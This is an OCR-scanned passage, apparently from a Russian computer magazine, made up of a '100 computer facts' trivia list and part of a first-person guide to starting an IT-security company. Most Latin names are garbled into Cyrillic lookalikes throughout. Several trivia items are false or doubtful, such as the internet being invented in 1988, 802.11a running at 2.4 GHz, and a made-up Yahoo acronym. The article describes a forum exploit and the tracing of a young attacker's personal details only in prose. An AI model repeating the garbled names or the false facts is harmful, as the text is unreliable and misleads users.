ет 1 30 лет, проектировалась как наиболее неудобная из возможных. 
Дело в том, что пишущие машинки быстро приходили в неисправ- 
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ность, если машинистка печатала слишком быстро, и создатели пы- 
тались разработать раскладку для печати одной рукой. Использо- 
вавшаяся ранее ЭѴОВАК является эффективнее ОѴѴЕВТѴ на 70%. 

-► Внутри корпуса оригинальных Масіпіозб находятся 47 подписей со- 
трудников отдела Мае компании Арріе 1 982 года. 

-► Первая система распознавания речи появилась в Индии в 1971 году 
под кодовым названием Неагзау. 

* В течение последних 12 лет ІВМ получила более 30 тысяч патентов 
— больше, чем любая другая компания или частное лицо. 

-►Три самых производительных в мире компьютера созданы компани- 
ей ІВМ. Возглавляет список ІВМ В1иеОепе/1_ с максимальной произво- 
дительностью 367 Террафлоп. 
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-► Кодовое название группы 12-ти разработчиков ІВМ РС — «грязная 
дюжина». 

-»■ Первый мобильный робот, управляемый системой искусственного 
интеллекта, был сконструирован компанией ЗРІ в 1970 году и назы- 
вался ЗІтакеу. 

-» Когда впервые был изобретен СО, разработчики пытались опреде- 
лить для него объем и решили, что диск должен быть достаточно боль- 
шим, чтобы вместить Девятую Симфонию Бетховена, проигрываемую 
в любом темпе. А это примерно 72 минуты. 

-► Расстояние между записывающей головкой дисковода и крутящим- 
ся диском составляет 1 микродюйм. Для сравнения: ширина челове- 
ческого волоса составляет 4 тысячи микродюймов. 

-► Первым портативным компьютером был ОзЬогпе Сотриіег, пред- 
ставленный в 1981 году. Он весил около 12 килограммов, имел 5- 
дюймовый монитор, два 5-дюймовых дисковода, 64 Кб ОЗУ и стоил 
$1,795. 

-► Первый жесткий диск, используемый в компьютерах Арріе, имел 
объем 5 Мб. А первым компьютером, где использовались графичес- 
кий интерфейс и мышь, был Арріе І_іза. 

-»• Во время работы мощнейший компьютер своего времени ЕЫІАС 
требовал такого количества электроэнергии, что огни близлежащего 
города тускнели при его запуске. 

+ Датские инженеры разработали компьютер, который позволяет 
корове доить саму себя. К загривку животного подключают компью- 
терный чип, который определяет, когда корова не доена в течение 
определенного времени. Он подает сигнал вакуумным устройствам, 
которые и получают из коровы молоко. Автоматическая дойная систе- 
ма стоит 250 тысяч долларов и увеличивает удои на 15%. 

-► Первый матричный принтер был сконструирован в 1964 году и ис- 
пользовался в часах Зеіко для постоянной распечатки точного вре- 
мени. 

-► Интегральную схему изобрели независимо друг от друга и практи- 
чески в одно время двое инженеров: Джек Килби из Техаз Іпзігитепіз 
и Роберт Нойс из РаігсІтіІсІ Зетісопбисіог. 

О Софт 

-► В 1 999 году, во время судебных дел вокруг МісгозоЙ, вице-президент 
компании Джим Аллкин солгал при даче свидетельских показаний. 
Аллкин запустил видео, якобы демонстрирующее, насколько замед- 
лилась работа ѴѴіпбоѵѵз после удаления из системы Іпіегпеі Ехріогег’а. 
Вскоре оказалось, что это видео — обычная подделка. 

-> Список четырех крупнейших софтварных разработчиков в мире вы- 
глядит так: МісгозоЙ, Огасіе, Зар, Сотриіег Аззосіаіез. 

-► Первая версия ѴѴіпбоѵѵз, 1 .0, не пользовалась большой популяр- 
ностью, так как работала слишком медленно на доступных в то время 
РС, и все юзали старый добрый ООЗ. Стоила первая винда $1 00. 



ѴѴіпбоѵѵз 98 содержит 1 8 миллионов строк кода. 

Первым языком программирования для электронного компьютера 
был ЗНобСобе. 

-► Хочешь прочитать послание Стива Джобса Биллу Г ейтсу? Запусти 
боек в Мае 03 X, увеличь его размер до максимума и внимательно 
посмотри на иконку Маіі. 

Пингвиненка, который символизирует 03 І_іпих, зовутТих. 

Самый маленький веб-сервер был разработан индийским студен- 
том и называется іРіс. 

История ІІІМІХ началась с идеи Дениса Ричи портировать видеоигру 
на старенький компьютер РОР-7. 

+ Язык программирования ВАЗІС был разработан профессорами 
Джоном Кемени и Томасом Куртзом специально для школьников и 
студентов и должен был стать легче, чем РОРТРАЫ. Даже расшиф- 
ровывается язык как «Символьный код инструкций разностороннего 
применения для начинающих». 

+ В МісгозоЙ работает примерно 72 тысячи сотрудников (75% муж- 
чин, 25% женщин), а годовой оборот компании только от сетевых 
проектов составляет 44 миллиарда долларов. 

-► В начале 90-х годов ВВЗ были настолько популярным явлением, что 
стали выходить два печатных ежемесячных журнала, полностью пос- 
вященных электронным бордам. Воагбѵѵаісіт и ВВЗ Мадагіпе расска- 
зывали о новом софте и технологиях ВВЗ, людях, стоящих за ними, 
давали обзоры американских и зарубежных досок. 

-►Если ты введешь в ѴѴогб’е строку «=гапб (1)», то получишь забавный 
текст. 

-► Если Билл Г ейтс будет платить $1 каждый раз, когда у кого-то зави- 
сает винда, то МісгозоЙ станет банкротом через 3 года. 

-► В середине 80-х годов ІВМ-совместимый компьютер не счита- 
ли 100% совместимым, если он не мог запустить МісгозоЙ'з РІідіті 
Зітиіаіог. 

О Сети 

-► В начале 1 995 года в интернете насчитывалось 24 миллиона пользо- 
вателей, из которых 17 миллионов жили в США. С каждым годом, на- 
чиная с 1 988 года, когда интернет был изобретен, количество юзеров 
увеличивалось вдвое. 

-► Первым зарегистрированным доменом в интернете был зѵптЬоІісз. 
сот (15 марта 1985 года). Семь из первых десяти доменов принадле- 
жали различным университетам. 

-► Беспроводная связь на протоколах 802.1 1а-с работает на частоте 
2,4 Ггц. На той же частоте работают микроволновые печи. Так что, 
если ты подойдешь с ноутом достаточно близко, связь оборвется. 
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-> Имя поисковика Ѵабоо означает Ѵеі Апоібег НіегагсбісаІ ОКісіоиз 
Огасіе, что в переводе с английского означает «еще один иерархи- 
ческий исполнительный предсказатель». 

->• Первое электронное письмо было отправлено в 1971 году Реем 
Томлинсоном — автором программы для обмена сообщениями между 
компьютерами. Он же предложил использовать значок @ для разде- 
ления имени пользователя и компьютера. Адрес мистера Томлинсона 
выглядел так: іотІіпзоп@Ыэп-іепеха. 

Крупнейший онлайновый магазин Атагоп.сот дает возможность 
авторам самостоятельно устанавливать цену на свои книги. Но при 
этом Амазон забирает 55% прибыли. 

->■ Первым в истории интернет-провайдером был Сотризегѵе, осно- 
ванный в 1 969 году и сейчас принадлежащий АОІ_. 

Официально первый русский домен .31) (Зоѵіеі Упіоп) был зарегис- 
трирован в 1990 году компанией ДЕМОС, и уже через год провайдер 
предоставлял доступ всем желающим за 20 рублей. 

Создатели поисковика Ооодіе хотели назвать свое детище ОоодоІ 
(10 в сотой степени — именно столько страниц они собирались про- 
индексировать), но домен с таким названием был уже занят, поэтому 
остановились на гугле. 

Рекорд количества одинаковых запросов в Ооодіе датируется 19 
сентября 2005 года, когда миллионы людей ввели словосочетание 
«Ниггісапе гііа». 

Все домены из любых трех букв уже зарегистрированы. 

Более 80% домашних страничек в инете — на английском языке. 

-»> В июне 2002 года сетевым аукционом ЕЬау пользовались почти 50 
миллионов человек, продавая и покупая около 1 1 миллионов товаров 
на общую сумму 9,3 миллиарда долларов. Стоит ли говорить, что за 
прошедшие 4 года эти цифры только выросли. 

Рекорд скорости передачи данных принадлежитученым из немецко- 
го университета Фронховер и японским инженерам из Рфіізи, которые 
объединились вместе с целью побить старый рекорд 1 ,28 Террабит в 
секунду. 25 марта 2006 года, используя оптоволоконную линию, лазе- 
ры и систему ультра-коротких вспышек света, они удвоили этот пока- 
затель, что эквивалентно передаче 60 0\Ю в секунду. 

->• По подсчетам ІМеісгаф занимающейся аналитикой и статистикой се- 
тевых ресурсов, на декабрь 2005 года в интернете зарегистрировано 
74 миллиона сайтов. Для сравнения: в 1993 году их было всего 130. 

Специалисты утверждают, что в 2005 году количество сетевых поль- 
зователей перевалило за миллиард. 

Первым человеком, которому в судебном порядке запретили до- 
ступ в интернет, стал Крис Лампрет, более известный как хакер Міпог 
Тбгеаі. В мае 1 995 года его обвинили в нескольких компьютерных пре- 
ступлениях, включая кражу и продажу корпоративной информации.. 



->• По мнению ученых из канадского университета Карлтона, пользо- 
вателю хватает 1/20 секунды, чтобы составить первое впечатление о 
сайте и решить для себя, будет ли он изучать его дальше или закроет 
и перейдет на другой. 

-► Некоторые победители «сетевого Оскара» ѴѴеЫоу Аѵѵагбз в 2006 
году: ІпйрУ/тарз.доодІе.сот (сервисы), НДр://па1іопаІдеодгарІпіс.сот/ 
депоагарЫс (наѵка). ІпйрУ/зіеѵепзеЬгіпд.сот (персональная странич- 
ка), НДрѴ/пеѵѵз.Ыэс.со.ик (новости), бНр://4аЬсІпаппеІ.сот (музыка), 
ИДрѴДІпеопіоп.сот (юмор). ИДр://зіаскороІіз.сот (игры). 

-► Самое длинное доменное имя состоит из 63 букв и выглядит так: 
ѵѵѵѵѵѵ.ІІпеІопаезІсІотаіппатеіпІІіеѵѵогІсІапсШпепзотеапсШпепзотето 
геапсітоге.сот . Его авторы пытались зарегистрировать себя в кни- 
ге рекордов Гиннеса, но получили отказ, поскольку «для регистра- 
ции домена не нужно прилагать больших усилий». Самое длинное 
доменное имя из цифр принадлежит японскому сайту, посвященно- 
му числу Рі: 3. 1 41 5926535897932384626433832795028841 97169399 
3751 05820974944592. ір 

□ Компьютерные игры и фильмы 

-»■ Первой в истории видеоигрой была ЗрасеѴѴагз, созданная в 1961 
году студентом Массачусетского технологического университета 
Стивом Расселом для РОР-1 . 

->• Компьютерная игра НаІо2 принесла разработчикам в первый день 
продаж 125 миллионов долларов — больше, чем любой фильм в ис- 
тории Г олливуда. 

->• Самым большим долгостроем в истории компьютерных игр являет- 
ся Ргеу, разработка которого была впервые заявлена в 1995 года, но 
вышел он только в июне 2006. За это время Ргеу сменил несколько 
движков, концепций и команд разработчиков. 

-►С 1982 года, когда был изобретен Тетрис, игра была продана в коли- 
честве 40 миллионов копий по всему миру. 

->• Самая дорогостоящая в плане разработки игра называется 
ЗбепМие. Она была создана для Зеда Огеатсазі и обошлась разра- 
ботчикам в 20 миллионов долларов. 

Крупнейшим игровым издателем в мире является компания 
ЕІесігопіс АіДз, в которой работает почти 5000 человек и которая 
ежегодно издает игры на сумму 3 миллиарда долларов. 

->• Первое «пасхальное яйцо» (спрятанная разработчиком фишка в 
коде программы) принадлежит компьютерной игре «Абѵепіиге» . Игра 
вышла в 1 978 году, и, так как в то время компания Аіагі не оставляла в 
своих программах кредитсов авторов, программистУоррен Робиннет 
решил упоминание о себе спрятать внутри. Чтобы попасть в комнату с 
именем разработчика, нужно было отыскать невидимую точку в одной 
из частей лабиринта и перенести ее в другой конец уровня. Первым, 
кто это сделал, стал молодой парнишка из Солт Лейк Сити. 

->• По статистике, средний возраст постоянных покупателей компью- 
терных игр составляет 40 лет. В 2006 году 93% покупателей игр для РС 
и 83% покупателей игр для игровых консолей были старше 1 8 лет. 



/ юо 
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100 КОМПЬЮТЕРНЫХ ФАКТОВ 




-► В Китае запрещено играть в игры, где практикуется убийство других 
людей. 

-► Первым Зб-ускорителем для игр была карта Ѵоосіоо ОгарЫсз компа- 
нии ЗсІТх Іпіегасііѵе, выпущенная в 1 996 году. Она занимала отдельный 
РСІ-слот, имела 4/6 Мб памяти и отдельно требовала для работы обыч- 
ную ѴОА-карточку. 

-► Вскоре после окончания съемок фильма «Хакеры» Джонни Ли Мил- 
лер, сыгравший хакера СгазН Оѵеггісіе и Анжелина Джоли (АсісІ Вигп), 
поженились. 

-► Первым полнометражным компьютерным фильмом стала «Игру- 
шечная история» от Ріхаг и Эізпеу. 

-► После выхода культового фильма «Военные игры» разработчики ОС 
В8Э включили скрипт /изг/датез/ѵѵагдатез, который предлагал юзе- 
ру немного поиграть. И при неверном выборе цитировал известную 
фразу из фильма: «Единственный выигрышный ход — не играть». 

-► Построенный специально для съемок «Военных игр» компьютерный 
центр ЫОЯАЭ стал самым дорогостоящим искусственным съемочным 
помещением своего времени и обошелся в 1 миллион баксов. Всего на 
съемки фильма ушло 1 2 миллионов, в прокате собрали 74 миллиона. 

-► Чтобы поиграть на Арріе ІросІ в игрушку Вгеакоиі, нужно зайти из 
главного меню в директорию «АЬоиі» и зажать на пару секунд цент- 
ральную кнопку. 




-► Самой активной хакерской группой в конце 70-х — начале 80-х го- 
дов была банда Роско, в которую входил получивший позже большую 
известность Кевин Митник. Правда, специализировалась она не на 
компьютерных, а нателефонных сетях крупных компаний. 



-► Хакерский манифест, получивший огромную популярность в анде- 
граунде 80-х и 90-х годов, был написан хакером Мепіог в 1986 году 
вскоре после его ареста. 



-►Хакерская конференция Эеісоп, которая впервые состоялась в Лас- 
Вегасе в 1993 году, планировалась как одноразовая встреча, чтобы 
сказать «Гудбай» электронным доскам ВВЗ. Но получилатакой успех, 
что стала проводится ежегодной по сей день. 



-► Кевина Митника — самого известного в мире хакера — арестовыва- 
ли 4 раза. Последний раз — в 1 995 году в городе Ралейх, где Кевин сни- 
мал квартиру и проделывал свои взломы. Хакер получил самый долгий 
в истории срок за совершение компьютерных преступлений — 5 лет. 

-► В 1 998 году в Китае двух хакеров, взломавших компьютерную сис- 
тему банка и выкравших около 31 тысячи долларов, приговорили к 
смертной казни. 

-► Впервые специалисты всерьез задумались об уязвимости инфра- 
структуры интернета в целом в 2001 году, после массированной ха- 
керской атаки на 13 главных сетевых узлов (гооі), предоставляющих 
маршрутную карту практически всего трафика сети. Правда, тогда 
пользователи не заметили падения скорости работы интернета. 



-► В 1 996 году одной из главных сенсаций в Японии стало появление 
Томагочи — простенькой видеоигры с тремя кнопками, целью кото- 
рой является воспитание и забота об электронном питомце. Назва- 
ние в переводе с японского звучало как «требующее любви яйцо», 
аавтором идеи стала 31 -летняя японкаАки Маита, продавшая свою 
концепцию электронного зверька крупнейшему в Японии произво- 
дителю игрушек Вапсіаі Согрогаііоп. Релиз Томагочи состоялся 23 
ноября 1 996 года, продажи новинки в Азии и США принесли компа- 
нии более 240 миллионов долларов. 

О Хакеры 

-► Проекту сіізігііэиіесі.пеі потребовалось 4 года и участие более 330 
тысяч человек, чтобы взломать 64-битную систему шифрования, 
разработанную ВЗА Эаіа Зесигіііез. 

-► 128-битное шифрование ЗЗІ_ настолько сложное, что даже если 
современные компьютеры будут в миллион раз мощнее, для взлома 
кода потребуется больше времени, чем прошло с момента зарожде- 
ния Вселенной. 



О Компьютерные вирусы и спам 

-► Первый компьютерный вирус, распространившийся за пределы 
машины автора, получил название ЕІк СІопег. Написан он был в 1 982 
году Ричем Скрента и ориентировался на компьютеры Арріе. 

-► Первое спамерское сообщение было отправлено в 1978 году в 
сети Аграпеі 400 подключенным пользователям. Оно включало не- 
большой патч от ЭідііаІ Ециіртепі Согрогаііоп для новых компьюте- 
ров Эесзузіет-20, который далеко не всем был нужен. 

-► Компьютерный червь СобеВесІ, явивший себя миру 19 июля 2001 
года, за 14 часов заразил более 300 тысяч компьютеров и обошелся 
компаниям в 2,6 миллиарда долларов. 

-► Первый компьютерный баг был найден Г рейс Мюррей Хоппер, ра- 
ботающей с компьютерами Магк II. Во время сбоя женщина провери- 
ла реле и обнаружила залетевшую туда моль, ставшую причиной не- 
поладки. Это был первый случай, когда слово «баг» использовалось 
для обозначения различных проблем в софте или железе. 



-►Один из основателей компании Арріе — Стив Возняк — зарабатывал 
в студенчестве тем, что собирал и продавал студентам Блу Боксы. 

-► Первой крупномасштабной антихакерской операцией, кото- 
рую провели сотрудники Секретной Службы США, была операция 
ЗипсІеѵіІ. В мае 1990 года она охватила 13 американских городов. В 
результате десятков рейдов удалось изъять 42 компьютера, 23 ты- 
сяч РЭЭ-дисков и бесчисленное количество распечаток. 



-► Первым человеком, арестованным за спам в системах мгновенных 
сообщений (типа ІСО) стал 18-летний Энтони Греко. Это произошло 
21 февраля 2005 года. 

-► В 1991 году известный вирусмейкер Эагк Аѵепдег зарелизил МіЕ 
(Миіаііоп Епдіпе) — алгоритм, позволяющий вирусам мутировать в 
более чем 4 миллиарда различных форм, значительно затрудняя их 
нахождение антивирусами. 
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-> Обороты средств в компьютерном фрауде как минимум в 4 раза пре- 
вышают количество денег, похищенных обычными видами преступ- 
лений. 

-► Спам составляет более 70% всех емейлов, проходящих в сети. За 
счет времени, потерянного работниками наудаление спама, компа- 
нии теряют более 1 0 миллиардов долларов ежегодно. 

-►В 2004 году компании МісгозоЙ и ЗСО Огоир пообещали выпла- 
тить по 250 тысяч долларов любому, кто поможет властям аресто- 
вать автора компьютерного червя Мубоот. В январе этот червячок 
поразил весь мир скоростью распространения, а основной его це- 
лью было совершение Эо8-атак на компьютеры вышеупомянутых 
компаний. Несмотря нато, что различные версии Мубоот выходили 
вплоть до февраля 2005 года, автора так и не нашли. 

В 1992 году все компьютерное сообщество со страхом ожидало, 
когда настанет 6 марта. В этот день ожидалось, что вирус МісИеІапдеІо 
обрушит всю компьютерную сеть и наведет настоящий технологичес- 
кий хаос. Но опасения не оправдались — судный день прошел прак- 
тически безболезненно. 

-► Червь Морриса, который в 1 988 году обрушил тысячи компьютеров 
АРРАпеі, не был деструктивным. Такие последствия были вызваны 
ошибкой в одном-единственном символе, сделанным автором, в ре- 
зультате чего червь стал неуправляем. 

□ Разное 

Средний юзер, проводящий время за компьютером, моргает 7 раз 
в минуту. 

■>В 1977 году основатель и президент ЭідііаІ ЕдиіртепіСогрогаііоп Кен 
Олсон заявил: «Нет причин для того, чтобы обычные люди имели у себя 
дома компьютер». 4 годами позднее Билл Г ейтс твердил, что 640 Кб 
ОЗУ должно хватить любому пользователю. 

-> Глава Місгозоіі получает более 5 миллионов емейлов в день. 

-► Первая программа, которую написал Билл Гейтс, была слишком 
большой, чтобы поместиться в памяти персональных компьютеров 
того времени. РСимел 16 Кб ОЗУ, а программа занимала 34 Кб. 

-> Штаб-квартира МісгозоЙ находится городе Редмонд, штат Вашинг- 
тон. А ІпіеІ базируется в Санта Клара, Калифорния. 

-► Доктор Девид Бредли — один из 12 инженеров, разработавших ІВМ 
РС, — предложил использовать для быстрой перезагрузки компью- 
тера комбинацию клавиш СігІ — АН — Езс. Но поскольку такую комби- 
нацию можно было случайно нажать одной рукой, то вскоре она была 
изменена на СігІ+АІі+ЭеІеіе. 

Отцом смайлика принято считать Скотта Фолмана, который 1 9 сен- 
тября 1982 года, во время общения на ВВЗ университета Карнеги 
Меллон, использовал символы «:-)» для обозначения улыбающейся 
рожицы. 



-►В 1982 году журнал Тіте назвал компьютер «человеком года». 

-► Актриса Сандра Баллок как-то сказала в интервью: «Слава — это 
когда после поломки модема ремонтник приходит в твой дом немного 
быстрее, чем обычно». 

-► Во время всемирной паники вокруг компьютерной проблемы 2000 
года правительство США выделило 200 миллиардов долларов, чтобы 
защитить американские банки от возможного хаоса в их компьютер- 
ных сетях. 

-► Департамент полиции Лос-Анджелеса использует в работе компью- 
терную программу НІТМАІЧ (НотісісІеТгаскіпд МападетепіАиіотаІіоп 
ІЧеіѵѵогк), которая помогает находить убийц. 

-► По статистике журнала Атегісап Ргодгаттег 31 % софтварных про- 
ектов останавливается до своего окончания, 52% превышают запла- 
нированную стоимость разработок на 190 и более процентов, 94% 
новых проектов создаются на основе предыдущих, менее успешных 
идей. 

-► Страх перед компьютерами или работой за компьютером называет- 
ся киберфобией. 

75% американцев используют интернет и проводят в среднем 3 часа 
вдень онлайн. 

•+ Несмотря нато, что количество персональных компьютеров в Индии 
не превышает 5-ти миллионов, эта страна является одним из мировых 
лидеров по количеству софтварных специалистов и ежегодно постав- 
ляет программы общей стоимостью около 10 миллиардов долларов. 
28% сотрудников ІВМ — индийцы. 

-► В результате двухлетних исследований, проведенных в универси- 
тете Калифорнии, ученые подсчитали, что за свою историю челове- 
чество произвело более 28 Экзобайт (1 Еб = 1 0 Л 1 8 Бит) уникальной 
информации. 

-► Президент США Билл Клинтон заявил в мартовском интервью 
2000 года, что он не пользуется электронной почтой для общения 
с дочерью Челси, так как считает этот вид связи недостаточно за- 
щищенным. 

Трое из 6-ти самых богатых людей на планете заработали свое со- 
стояние, работая в ІТ-сфере. 

-► Отцом-основателем Кремниевой Долины называют Фреда Терма- 
на. А название ей дал журналист Дон Хоифлер. 

-► По статистике, среди компьютерных инженеров только 9% женщин. 

-►Цены 1990 годананекоторые компьютерные комплектующие: сопро- 
цессор 80387, 20 Мгц — $1092, РЭЭ 5,25 — 1.2 Мб — $249, видеокар- 
та Н-256 с поддержкой разрешения 1024x768 и 256 цветов — $6699, 
цветной монитор 15~ и разрешением 960x720 — $2362, винчестер на 
600 Мб — $6851 , модем 9600 Ѵ29 — $5728. =Н= 
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ПРОФЕССИИ, КОТОРЫЕ МЫ ВИБИРАЕМ 






© ПЛАНИРОВАНИЕ 



Первый шаг делается задолго до открытия фирмы. 
Для начала необходимо четко представить себе 
процесс работы: какие услуги ты будешь предла- 
гать, какие товары продавать. К примеру, я выбрал 
направление программирования и создания сайтов, 
а также защиты информации. Чем больше спектр 
предоставляемых услуг, тем лучше. Далее необходи- 
мо расписать весь план работы. Основные моменты 
— что ты продаешь, сколько необходимо человек для 
создания продукта, их должности (задачи, кто за что 
отвечает), сколько это будет стоить и в какие сроки 
делаться. Штат сотрудников типичной зесигііу-компа- 
нии состоит из программистов и дизайнеров, которые 
делают сайты и программы, системного администра- 
тора, который управляет сервером, необходимым для 
работы и настройки клиентских машин, специалистов 
по безопасности, которые тестируют результаты и 
занимаются защитой информации, арт-директора, 
руководящего проектами и исполнителями, менедже- 
ров, занимающихся поисками клиентов и работой с 
ними, а также исполнительного директора, который 
помогает руководить компанией (на случай, если ты 
уехал в отпуск или командировку). На первых порах, 
когда штата еще нет, ты будешь выполнять большинс- 
тво этих задач, поэтому нужно самому быть профес- 
сионалом в выбранном деле. Мне приходилось про- 
граммировать, работать с клиентами и делать многие 
другие вещи. Параллельно с учебой в ВУЗе я бы поре- 
комендовал официально устроиться на работу в одну 
из фирм, которые работают в том же направлении. 
Пройти там несколько должностей по карьерной лес- 
тнице, увидеть на практике, как все работает изнутри. 
Сам я поработал несколько месяцев на должности ди- 
зайнера и ѵѵеЬ-программиста в дизайн-студии, потом 
меня перевели на должность арт-директора — все это 
делалось с единственной целью: увидеть процесс ра- 
боты компании, ознакомиться с документооборотом, 
необходимым в работе. Также я подрабатывал тесте- 
ром и программистом в фирме по компьютерной безо- 
пасности. Только получив опыт и багаж знаний, я смог 
открыть собственную компанию. 



і 



(2) ВЕРБОВКА 

Следующим шагом является поиск сотрудников и оп- 
ределение системы оплаты. То есть менеджеры ищут 
клиентов (они это могут делать разными способами, 
начиная с прямого обзвона по желтым страницам с 
предложением услуг и заканчивая интернет-марке- 
тингом своего сайта, а также работой по связям — у 
всех есть знакомые, родители, партнеры по бизнесу), а 
исполнители создают продукт. Персонал должен быть 
надежным: сотрудники не пропадают, всегда на связи и 
доводят проекты до конца, они должны быть професси- 
оналами, иначе проекты будут тянуться долго и сложно 
(исправление ошибок может отнять много времени). 
Подбором нужных людей можно заняться через мно- 
гочисленные фрилансовые сайты, которые посещают 
одинокие специалисты, сайты по поиску работы типа 
ІоЬ.ги или через знакомых. Хотя своих работников я 
нашел по-другому. Создал хакерский портал ѵѵѵѵѵѵ. 
сѵЬегІпаск.ги . который действовал в рамках законода- 
тельства РФ и основной целью имел возрождение куль- 
туры ѵѵбііе баіз. Там я старался донести до людей, что 
нужно направлять свою энергию в полезное русло, и 
если ты предпочитаешь взлом защите информации, то 
и здесь можно проявить себя с хорошей стороны: анти- 
террор, закрытие сайтов, пропагандирующих расизм 
и войну, сайтов с детской порнографией, лохотронов 
и прочего трэша. В процессе активной раскрутки пор- 
тала к работе подключилось огромное количество лю- 
дей, сформировалось сообщество, откуда мне было 
удобно вербовать самых заметных и перспективных 
кодеров. Самым важным было то, что эти ребята готовы 
были работать на первых порах бесплатно, находя вза- 
имные интересы в различных проектах. После того как 
сформировался коллектив, можно было приступать к 
следующему этапу — открытию фирмы. 






СЦЕНА 



РЕГИСТРАЦИЯ 



Регистрацию юридического лица можно произвес- 
ти двумя путями. Первый — это самому собрать все 
документы и подать их в налоговую инспекцию для 
постановки на учет (а для этого нужно обладать со- 
ответствующими знаниями). Второй способ проще 
— нужно обратиться в фирму, специализирующуюся 
на регистрации юридических лиц. Стоимость такой 
услуги составляет $300-400, тебе нужно только при- 
думать название, логотип, печать и затем прийти че- 
рез пару недель за готовым пакетом документов. Это 
очень ответственный шаг, поэтому фирму нужно вы- 
бирать надежную, которая уже работает как минимум 
несколько лет и у которой имеются хорошие реко- 
мендации. Основные документы, которые тебе пона- 
добятся: Свидетельство о государственной регистра- 
ции юридического лица, Свидетельство о постановке 
на учет в налоговом органе и Устав фирмы. После 
этого необходимо добавить в штат сотрудников еще 
одного человека, исполняющего обязанности бух- 
галтера (зарплата от $300). Последним этапом будет 
открытие счета в банке. К выбору банка также нужно 
подойти серьезно, ведь это и престиж, и надежность, 
и комфорт работы. Открытие счета и банковское об- 
служивание стоит до 2-3 тысяч рублей. 

Когда все формальности будутулажены, придет пора 
подыскать офис. Вообще, всю работу можно вести 
через интернет, общаясь с сотрудниками по теле- 
фону и проводя встречи в кафе или у клиентов, но с 
первыми серьезными проектами просто необходимо 
перебираться в бизнес-центр, чтобы клиент понимал: 
у тебя не какая-то «шарашкина контора», а солидный 
бренд. Аренда офиса стоит от 800 до 2000 долларов в 
месяц. Как только ты набирешь такой денежный обо- 
рот, необходимо сразу им воспользоваться. Офис 
лучше всего выбирать ближе к центру города, с хо- 
рошей охраной, ремонтом и с выделенными линиями 
интернета, что сейчас предоставляется фактически 
везде. Также необходимо позаботиться о создании 
официального сайта, так как сайт — это основной РЯ- 



инструментлюбой современной компании. Первые 
версии сайта, если с деньгами туго, можно сделать 
своими силами, но со временем лучше заказать ди- 
зайн специализирующейся на этом компании, что 
обойдется в сумму от $1500. Одним изнаправлений 
ѴѴеЬЗесиге является создание сайтов, так что для 
меня это не было проблемой. 

После открытия компании тебе понадобится 
юрист, чтобы грамотно составить надлежащий па- 
кет документов для работы с клиентами. Там будет 
содержаться разная информация о твоей компа- 
нии, список предоставляемыхуслуг и цены, формы 
договоров на все виды деятельности, счета, акты о 
выполнении работ. Тебе, как директору, придется 
разобраться во всем этом. Образцы подобных до- 
кументов можно попробовать получить в одной из 
других зесигііу-фирм. 






ПРОФЕССИИ, КОТОРЫЕ МЫ ВИБИРАЕМ 



Процесс работы 



Рабочие будни 



Клиенты — это хлеб компании. Несмотря на то, что поиск клиен- 
тов — задача менеджеров, заниматься этим будут все сотрудники 
компании и ты, как руководитель, больше всех. Я находил клиентов 
через интернет, через своихзнакомых, по связям, постепенно фор- 
мируя клиентскую базу. Потом старые клиенты рекомендовали нас 
и приводили новых — это напрямую зависит от качества работы и 
предоставляемых твоей фирмой услуг. Так какя изначально сделал 
ставку на профессионализм сотрудников, это дало возможность 
поднять качество работы на высокий уровень и быстро расширить 
клиентскую базу. Сейчас большинство наших сотрудников регу- 
лярно проходят различные курсы, начиная от курсов по дизайну и 
защите информации и заканчивая курсами бизнес-тренингов для 
менеджеров, повышающих коммуникацию. 

После того как ты находишь нового клиента, с ним начинает рабо- 
тать менеджер. Часто я сам езжу на первые встречи, чтобы лично 
познакомиться с руководителем компании, с которой мы собира- 
емся сотрудничать. Далее подписывается договор, формируется 
техническое задание и начинается процесс работы, который завер- 
шается подписанием акта выполненных работ и оплатой счета. В на- 
шей фирме основными являются заказы на создание защищенных 
сайтов, их обслуживание, тестирование безопасности (реп-іезііпд) 
уже существующих порталов, предоставление рекомендаций по их 
защите. Сейчас это особенно актуально, так как рунетуязвим перед 
хакерами. Многие программисты слабо разбираются в вопросах 
безопасности и тем не менее выкладывают в сеть свои программы 
и скрипты, в которых множество багов. Также часто сайты работают 
на пиратском софте (варезные скрипты, форумы, гостевые книги, 
зануленные платные СМ8), который содержит встроенные бекдо- 
ры, админы забывают или просто не хотят устанавливать обновле- 
ния и зесигііу-фиксы. Наша задача — быстрое блокирование нару- 
шителя в случае хакерской атаки и затем нахождение подробной 
информации о нем с последующей передачей в правоохранитель- 
ные органы или службу безопасности клиента. В качестве примера 
приведу реальный случай из практики ѴѴеЬЗесиге. 

У клиента был установлен форум ІРВ последней версии, хакер ре- 
шил взломать его с помощью эксплоита, создающего на странице 
форума сообщение, где содержится вредоносный код — он поз- 
воляет выполнять команды на сервере. Через минуту после созда- 
ния такого сообщения на форум зашел наш сотрудник, перешел в 
панель администратора и увидел, что хакер сидит под его учетной 
записью. ІР взломщика был тутже заблокирован, после чего адми- 
нистратор просмотрел его учетную запись, зарегистрированную 
на форуме, и нашел в ней номер ІСО. Через этот номер уапбех 
выдал много интересных страниц, часть из которых содержала 
реальные контакты (страница на сайте знакомств, содержащая 
фотографии, дату рождения, рост, вес и т. д., страница на доске 
объявлений с предложением создать музыкальную группу и прила- 
гающийся контактный телефон). Все это было аккуратно сложено 
в файл и передано в службу безопасности клиента. После чего, 
учитывая молодой возраст хакера, мы не стали обращаться в ми- 
лицию, а вместо этого связались с родителями парня и попросили 
их принять меры. 



Поднять компанию с нуля — предельно сложно, и, чтобы добиться 
результатов, необходимо много работать. Тут все зависит от тебя: 
чем серьезнее твой подход, тем лучше. Я прочитал кучу сайтов для 
руководителей отом, как грамотно руководить коллективом, плани- 
ровать свое время, общаться с клиентами, сейчас регулярно читаю 
новости из области компьютерной безопасности и ІТ-технологий. 
Юридическое лицо подразумевает высокий уровень ответствен- 
ности — все, что делает твоя фирма, должно быть на качествен- 
ном уровне. Временные рамки устанавливаются договором, невы- 
полнение которого может привести к немалым расходам, поэтому 
необходимо себя заранее готовить к дисциплине, пунктуальности, 
корректности и высокому профессионализму в бизнесе. С другой 
стороны, должность руководителя приносит совсем иной уровень 
доходов. Этот уровень уже не ограничивается фиксированной за- 
рплатой и полностью зависит от тебя, от числа проектов, которые 
твоя фирма сможет осуществить в течение месяца. Для того чтобы 
добиться высокой зарплаты, необходимо сфокусироваться на пос- 
тоянных клиентах и стараться делать не столько разовые проекты, 
сколько проекты, требующие регулярной поддержки, техническо- 
го обслуживания, обновлений и прочего. 

Компьютерные технологии и особенно компьютерная безопас- 
